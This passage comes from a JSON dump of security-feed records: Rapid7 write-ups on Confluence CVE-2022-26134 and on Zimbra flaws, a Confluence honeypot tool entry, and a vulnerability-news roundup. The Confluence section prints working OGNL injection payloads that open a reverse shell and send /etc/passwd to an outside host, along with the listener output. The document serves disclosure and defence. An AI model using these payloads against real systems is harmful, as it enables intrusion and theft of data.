is, perhaps, an interesting place for others to explore.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/\n \n\nDecoded, the exploit looks like the following:\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()\")}\n \n\nAnd results in a reverse shell:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37148\n bash: cannot set terminal process group (34470): Inappropriate ioctl for device\n bash: no job control in this shell\n bash: /root/.bashrc: Permission denied\n confluence@ubuntu:/opt/atlassian/confluence/bin$ id\n id\n uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)\n confluence@ubuntu:/opt/atlassian/confluence/bin$\n \n\nOf course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/\n \n\nWhen decoded, the reader can see that we again have relied on the Nashorn scripting engine.\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}\n \n\nAgain, the attacker is listening for the exfiltration which looks, as you\u2019d expect, like `/etc/passd`:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37162\n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n \u2026 truncated \u2026\n \n\nFinally, note that the exploit could be entirely URI-encoded as well. Writing any type of detection logic that relies on **just** the ASCII form will be quickly bypassed.\n\n## Mitigation guidance\n\nAtlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available\u2014note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\nOrganizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.\n\nIf you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).\n\n## Rapid7 customers\n\n**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:\n\n * A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3\n * A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Confluence Java App Launching Processes\n\nThe Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any url path starting with `${` or `%24%7B`.\n\n## Updates\n\n**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.\n\n**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\n**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**\n\n**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.\n\n**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.\n\n**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.\n\nAttacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase. Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T23:27:15", "type": "rapid7blog", "title": "Active Exploitation of Confluence CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-06-02T23:27:15", "id": "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "href": "https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-26T21:03:28", "description": "\n\nOver the past few weeks, five different vulnerabilities affecting [Zimbra Collaboration Suite](<https://www.zimbra.com/>) have come to our attention, one of which is unpatched, and four of which are being actively and widely exploited in the wild by well-organized threat actors. We urge organizations who use Zimbra to patch to the **[latest version](<https://wiki.zimbra.com/wiki/Zimbra_Releases>)** on an urgent basis, and to upgrade future versions as quickly as possible once they are released.\n\n## Exploited RCE vulnerabilities\n\nThe following vulnerabilities can be used for remote code execution and are being [exploited in the wild](<https://www.cisa.gov/uscert/ncas/alerts/aa22-228a>).\n\n### CVE-2022-30333\n\n[CVE-2022-30333](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>) is a path traversal vulnerability in `unRAR`, Rarlab\u2019s command line utility for extracting RAR file archives. CVE-2022-30333 allows an attacker to write a file anywhere on the target file system as the user that executes `unrar`. Zimbra Collaboration Suite uses a vulnerable implementation of `unrar` (specifically, the `amavisd` component, which is used to inspect incoming emails for spam and malware). Zimbra addressed this issue in [9.0.0 patch 25](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>) and [8.5.15 patch 32](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32>) by replacing `unrar` with `7z`.\n\nOur research team has a [full analysis of CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis?referrer=blog>) in AttackerKB. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16796>) is also available. Note that the server **does not** necessarily need to be internet-facing to be exploited \u2014 it simply needs to receive a malicious email.\n\n### CVE-2022-27924\n\nCVE-2022-27924 is a blind Memcached injection vulnerability [first analyzed publicly](<https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/>) in June 2022. Successful exploitation allows an attacker to change arbitrary keys in the Memcached cache to arbitrary values. In the worst-case scenario, an attacker can steal a user\u2019s credentials when a user attempts to authenticate. Combined with [CVE-2022-27925](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>), an authenticated remote code execution vulnerability, and [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>), a currently unpatched privilege escalation issue that was publicly disclosed [in October 2021](<https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/>), capturing a user\u2019s password can lead to remote code execution as the root user on an organization\u2019s email server, which frequently contains sensitive data.\n\nOur research team has a [full analysis of CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis?referrer=blog>) in AttackerKB. Note that an attacker does need to know a username on the server in order to exploit CVE-2022-27924. According to Sonar, it is also possible to poison the cache for _any_ user by stacking multiple requests.\n\n### CVE-2022-27925\n\n[CVE-2022-27925](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>) is a directory traversal vulnerability in Zimbra Collaboration Suite Network Edition versions 8.8.15 and 9.0 that allows an authenticated user with administrator rights to upload arbitrary files to the system. (Note that Open Source Edition does not have that endpoint and is therefore not vulnerable.) On August 10, 2022, security firm [Volexity published findings](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) from multiple customer compromise investigations that indicated CVE-2022-27925 was being exploited in combination with a zero-day authentication bypass, now assigned CVE-2022-37042, that allowed attackers to leverage CVE-2022-27925 _without_ authentication.\n\n**Note:** Although the public advisories don't mention it, our testing indicated that Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable `mboximport` endpoint). Vulnerable versions are:\n\n * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)\n * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)\n\nOur research team has a [full analysis of CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>) in AttackerKB.\n\n### CVE-2022-37042\n\nAs noted above, CVE-2022-37042 is a critical authentication bypass that arises from an incomplete fix for CVE-2022-27925. Zimbra patched CVE-2022-37042 in [9.0.0P26](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26>) and [8.8.15P33](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33>).\n\n## Unpatched privilege escalation CVE-2022-37393\n\nIn October of 2021, researcher Darren Martyn [published an exploit](<https://github.com/darrenmartyn/zimbra-slapper/>) for a zero-day [root privilege escalation vulnerability](<https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/>) in Zimbra Collaboration Suite. When successfully exploited, the vulnerability allows a user with a shell account as the `zimbra` user to escalate to root privileges. While this issue requires a local account on the Zimbra host, the previously mentioned vulnerabilities in this blog post offer plenty of opportunity to obtain it.\n\nOur research team tested the privilege escalation in combination with CVE-2022-30333 at the end of July 2022, as well as the fully patched version on August 17, 2022, and found that all versions of Zimbra were affected through at least 9.0.0 P26 and 8.8.15 P33. Rapid7 disclosed the vulnerability to Zimbra on July 21, 2022 and later assigned [CVE-2022-37393](<https://nvd.nist.gov/vuln/detail/CVE-2022-37393>) (still awaiting NVD analysis) to track it. A [full analysis of CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>) is available in AttackerKB. A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16807>) is also available.\n\n## Mitigation guidance\n\nWe strongly advise that all organizations who use Zimbra in their environments update to the latest available version (at time of writing, the latest versions available are 9.0.0 P26 and 8.8.15 P33) to remediate known remote code execution vectors. We also advise monitoring [Zimbra\u2019s release communications](<https://wiki.zimbra.com/wiki/Zimbra_Releases>) for future security updates, and patching on an urgent basis when new versions become available.\n\nThe AttackerKB analyses for [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis?referrer=blog>), [CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis?referrer=blog>), [CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>), and [CVE-2022-37393](<https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393/rapid7-analysis?referrer=blog>) all include vulnerability details (including proofs of concept) and sample indicators of compromise (IOCs). Volexity\u2019s [blog](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published [lists of valid JSP files included in Zimbra installations](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\\(Un\\)authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0 (at time of writing).\n\nFinally, we recommend blocking internet traffic to Zimbra servers wherever possible and [configuring Zimbra to block external Memcached](<https://wiki.zimbra.com/wiki/Blocking_Memcached_Attack>), even on patched versions of Zimbra.\n\n## Rapid7 customers\n\nVulnerability checks for all five Zimbra CVEs are available via a content-only update as of August 18, 3pm ET.\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR\u2019s built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Suspicious Process - Zimbra Collaboration Suite Webserver Spawns Script Interpreter\n * Suspicious Process - \u201cZimbra\u201d User Runs Shell or Script Interpreter\n\nThe Rapid7 MDR (Managed Detection & Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>)_\n * _[Exploitation of Mitel MiVoice Connect SA CVE-2022-29499](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>)_\n * _[CVE-2022-27511: Citrix ADM Remote Device Takeover](<https://www.rapid7.com/blog/post/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/>)_\n * _[Active Exploitation of Confluence CVE-2022-26134](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-17T12:55:18", "type": "rapid7blog", "title": "Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26138", "CVE-2022-27511", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-29499", "CVE-2022-30333", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-08-17T12:55:18", "id": "RAPID7BLOG:B294A0F514563C5FBF86F841910C60BE", "href": "https://blog.rapid7.com/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-06-14T17:20:43", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEhvJYSxBzvhziiqnNQMt1sVNIxlGDPxGaEDU73ligxfwzMzbXBi3yU8ypWCvQXp4yv7swHFon8H2aJCrn8HmJ8P_U1VRKcyPGulS3ckJLMWG9BozW5mcPC4jFdBmj9GCHuwx1YkvX_tI6PP7DHV1cHwoJnI1zhRwdnEHR4gHpUl8wsRJXX2MsN1_rv7>)\n\n \n\n\nConfluencePot is a simple [honeypot](<https://www.kitploit.com/search/label/HoneyPot> \"honeypot\" ) for the Atlassian Confluence unauthenticated and remote OGNL [injection](<https://www.kitploit.com/search/label/Injection> \"injection\" ) [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )).\n\n \n\n\n## About the vulnerability\n\nYou can find the official advisory by Atlassian to this vulerability [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html> \"here\" ). For details about the inner workings and [exploits](<https://www.kitploit.com/search/label/Exploits> \"exploits\" ) in the wild you should refer to the reports by [Rapid7](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/> \"Rapid7\" ) and [Cloudflare](<https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/> \"Cloudflare\" ). Affected but not yet patched systems should be deemed **compromised** until further investigation.\n\n## About the tool\n\nConfluencePot is written in Golang and implements its own HTTPS server to minimize the overall attack surface. To make it appear like a legit Confluence instance it returns a bare-bones version of a Confluence landing page. Log output is written to stdout and a log file on disk. ConfluencePot **DOES NOT** allow attackers to execute commands/code on your machine, it only logs requests and returns a bogus response.\n\n### Building & Running it\n\nYou need a recent version of Golang to run/build confluencePot and the appropriate privileges to bind to port 443. We recommend to execute it in a tmux session for easier handling. To run ConfluencePot you either need to create a self-signed TLS certificate with _openssl_ or request one from e.g. _Let's Encrypt_.\n \n \n go build confluencePot.go \n ./confluencePot \n \n\n## Testing and Issues\n\nConfluencePot was tested using the public exploit by [Nwqda](<https://github.com/Nwqda/CVE-2022-26134> \"Nwqda\" ), which seems to be the most used variant in the wild at the time of writing. If you find anything wrong with confluencePot please feel free to open an issue or send us a pull request.\n\nFollow us on [Twitter](<https://www.kitploit.com/search/label/Twitter> \"Twitter\" ) \\--> [@SI_FalconTeam](<https://twitter.com/SI_FalconTeam> \"@SI_FalconTeam\" ) <\\-- to stay up to date with our latest research. Stay safe!\n\n \n \n\n\n**[Download confluencePot](<https://github.com/SIFalcon/confluencePot> \"Download confluencePot\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T12:30:00", "type": "kitploit", "title": "confluencePot - Simple Honeypot For Atlassian Confluence (CVE-2022-26134)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2613", "CVE-2022-26134"], "modified": "2022-06-13T12:30:00", "id": "KITPLOIT:3043339745958474082", "href": "http://www.kitploit.com/2022/06/confluencepot-simple-honeypot-for.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-07-06T14:56:26", "description": "Hello everyone! In this episode, I will try to revive Security News with a focus on Vulnerability Management.\n\nOn the one hand, creating such reviews requires free time, which could be spent more wisely, for example, on open source projects or original research. On the other hand, there are arguments in favor of news reviews. Keeping track of the news is part of our job as vulnerability and security specialists. And preferably not only headlines.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239095>\n\nI usually follow the news using my automated telegram channel [@avleonovnews](<https://t.me/avleonovnews>). And it looks like this: I see something interesting in the channel, I copy it to Saved Messages so that I can read it later. Do I read it later? Well, usually not. Therefore, the creation of news reviews motivates to read and clear Saved Messages. Just like doing Microsoft Patch Tuesday reviews motivates me to watch what's going on there. In general, it seems it makes sense to make a new attempt. Share in the comments what you think about it. Well, if you want to participate in the selection of news, I will be glad too.\n\nI took 10 news items from Saved Messages and divided them into 5 categories:\n\n 1. Active Vulnerabilities\n 2. Data sources\n 3. Analytics\n 4. VM vendors write about Vulnerability Management\n 5. de-Westernization of IT\n\n# Active Vulnerabilities\n\n##  "CISA warns of hackers exploiting PwnKit Linux vulnerability (CVE-2021-4034)" by [BleepingComputer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-pwnkit-linux-vulnerability/>)\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity Linux vulnerability known as PwnKit to its list of bugs exploited in the wild. Unprivileged users can exploit this vulnerabilities to gain full root privileges on Linux systems with default configurations. Reliable proof-of-concept (PoC) exploit code has been shared online less than three hours after Qualys published technical details for PwnKit. It was January 25th. The vulnerability was found in the Polkit's pkexec component used by all major distributions (including Ubuntu, Debian, Fedora, and CentOS). It has been hiding in plain sight for more than 12 years since pkexec's first release in May 2009.\n\nThe US cybersecurity agency gave all Federal Civilian Executive Branch (FCEB) agencies three weeks, until July 18, to patch their Linux servers against PwnKit and block exploitation attempts. Even though this directive only applies to federal agencies, CISA also strongly urged all US organizations from the private and public sectors to prioritize patching this bug.\n\n_Well, it would be correct to say that not only the Americans should quickly patch this._\n\n##  "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)" by [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/29/atlassian-confluence-ognl-injection-remote-code-execution-rce-vulnerability-cve-2022-26134>)\n\nOn June 02, 2022, Atlassian published a security advisory about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited would allow the attacker to execute commands remotely with user privileges running the Confluence application.\n\nTo detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n_In this detailed technical article, Mayank Deshmukh from Qualys describes OGNL Injection, RCE Payload, Exploit POC, Exploit Analysis and Source Code Analysis. If you are interested in how such vulnerabilities are exploited and detected, check out this article._\n\n# Data sources\n\n##  "New Vulnerability Database Catalogs Cloud Security Issues" by [DarkReading](<https://www.darkreading.com/cloud/new-initiative-seeks-to-shed-light-on-cloud-vulnerabilities>)\n\nOrganizations traditionally have struggled to track vulnerabilities in public cloud platforms and services because of the lack of a common vulnerability enumeration (CVE) program like the one that MITRE maintains for publicly disclosed software security issues. A new community-based database launched this week seeks to begin addressing that issue by providing a central repository of information on known cloud service-provider security issues and the steps organizations can take to mitigate them.\n\nThe database \u2014 [cloudvulndb.org](<http://cloudvulndb.org>) \u2014 is the brainchild of security researchers at Wiz, who for some time have been advocating the need for a public catalog of known security flaws on platforms and services run by the likes of AWS, Microsoft, and Google. The database currently lists some 70 cloud security issues and vulnerabilities. Such as Azure Open Management Infrastructure (OMI) Elevation of Privilege, OMIGOD. Anyone is free to suggest new issues to add to the website or to suggest new fixes to existing issues.\n\n_It's not clear if a separate database is really needed. It seems that all of these entries can be added as NVD CVEs. Moreover, many vulnerabilities in this database already have CVE IDs. But the initiative is good. It proves once again that MITRE and NVD have problems with coverage._\n\n* * *\n\n# Analytics\n\n##  "MITRE shares this year's list of most dangerous software bugs (CWE Top 25)" by [BleepingComputer](<https://www.bleepingcomputer.com/news/security/mitre-shares-this-years-list-of-most-dangerous-software-bugs/>)\n\nMITRE shared this year's top 25 most common and dangerous weaknesses impacting software throughout the previous two calendar years. These bugs are considered dangerous because they're usually easy to discover, come with a high impact, and are prevalent in software released during the last two years.\n\n_Let's see what's on top:_\n \n \n 1 CWE-787 Out-of-bounds Write \n 2 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') \n 3 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') \n 4 CWE-20 Improper Input Validation \n 5 CWE-125 Out-of-bounds Read \n 6 CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\n\n_Seems to be true, although 'OS Command Injection' could be higher. Well, we need to remember that CWE identifiers are assigned manually to vulnerabilities by some analysts and therefore there may be classification errors. But it's still interesting._\n\n##  "Cyberattacks via Unpatched Systems Cost Orgs More Than Phishing" by [DarkReading](<https://www.darkreading.com/vulnerabilities-threats/cyberattacks-bug-exploits-more-costly-incidents>)\n\n_This article is based on research of Tetra Defense, a leading incident response, cyber risk management and digital forensics firm based in Madison, Wisconsin._\n\nAttackers continue to find significant success targeting unpatched servers and vulnerable remote-access systems, researchers say -- and these types of compromises cost victim organizations 54% more than compromises caused by user actions (i.e., falling for phishing and opening malicious documents).\n\nAccording to a report by Tetra Defense, which analyzed incident data from the first quarter, unpatched vulnerabilities and exposing risky services\u2014such as Remote Desktop Protocol (RDP)\u2014account for 82% of successful attacks, while social-engineering employees to take some action accounted for just 18% of successful compromises. The article also mentions known vulnerabilities ProxyShell exploit for Microsoft Exchange servers, Log4Shell vulnerability in Java Log4j library.\n\nTwo controls -- comprehensive patching and using multifactor authentication (MFA) -- could have prevented nearly 80% of the investigated incidents.\n\n_Good point in the article: "Data on successful compromises can help companies determine the most critical attack vectors to address, but it should be noted that the conclusions depend greatly on the specific incident-response firm". But the fact that MFA and patching is very important is true._\n\n##  "Zero-Days Aren't Going Away Anytime Soon & What Leaders Need to Know" by [DarkReading](<https://www.darkreading.com/attacks-breaches/zero-days-aren-t-going-away-anytime-soon-and-what-leaders-need-to-know>)\n\n_The article was written by Dan Schiappa, Chief Product Officer of Arctic Wolf, Security Operations company_.\n\nBoth Google and Mandiant tracked a record number of zero-days last year. More zero-days are being discovered because security companies are getting better at finding them \u2014 not necessarily because hackers are coming up with new vulnerabilities. Not all zero-days are created equal. Some require 